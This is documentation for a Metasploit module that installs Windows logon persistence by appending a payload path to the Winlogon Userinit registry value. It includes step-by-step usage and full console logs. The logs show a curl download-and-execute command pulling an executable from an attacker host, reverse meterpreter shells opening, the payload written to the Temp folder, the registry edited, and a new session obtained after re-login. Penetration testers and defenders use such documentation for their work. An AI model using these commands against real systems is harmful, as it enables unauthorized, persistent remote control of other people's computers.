## Vulnerable Application This module will install a payload that is executed during user logon. It writes a payload executable to disk and modifies the Userinit registry value in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the payload path, causing it to execute when any user logs in. ## Verification Steps 1. Start msfconsole 2. Obtain an administrator level meterpreter on Windows 3. Do: `use modules/exploits/windows/persistence/registry_userinit` 4. Do: `set session #` 5. Do: `run` 6. On next user login, You should get a shell. ## Options ### PAYLOAD_NAME Name of payload file to write. Random string as default. ## Scenarios ### Windows 10 1909 (10.0 Build 18363) Initial admin shell ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /KAdxHNQrWO8cy5I90gLkHg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg [*] Sending payload to 2.2.2.2 (curl/7.79.1) [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49747) at 2026-01-03 16:20:11 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... ``` Install persistence ``` msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/registry_userinit [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(windows/persistence/registry_userinit) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(windows/persistence/registry_userinit) > set session 1 session => 1 msf exploit(windows/persistence/registry_userinit) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(windows/persistence/registry_userinit) > [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. Registry likely exploitable [+] Writing payload to C:\Users\windows\AppData\Local\Temp\UASEQXKrCsOUN.exe [*] Updating 'C:\Windows\system32\userinit.exe,' to 'C:\Windows\system32\userinit.exe,C:\Users\windows\AppData\Local\Temp\UASEQXKrCsOUN.exe' [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2052/WIN10PROLICENSE_20260103.2052.rc ``` Logout, and log back in to trigger payload execution ``` [*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49749) at 2026-01-03 16:21:15 -0500 msf exploit(windows/persistence/registry_userinit) > ```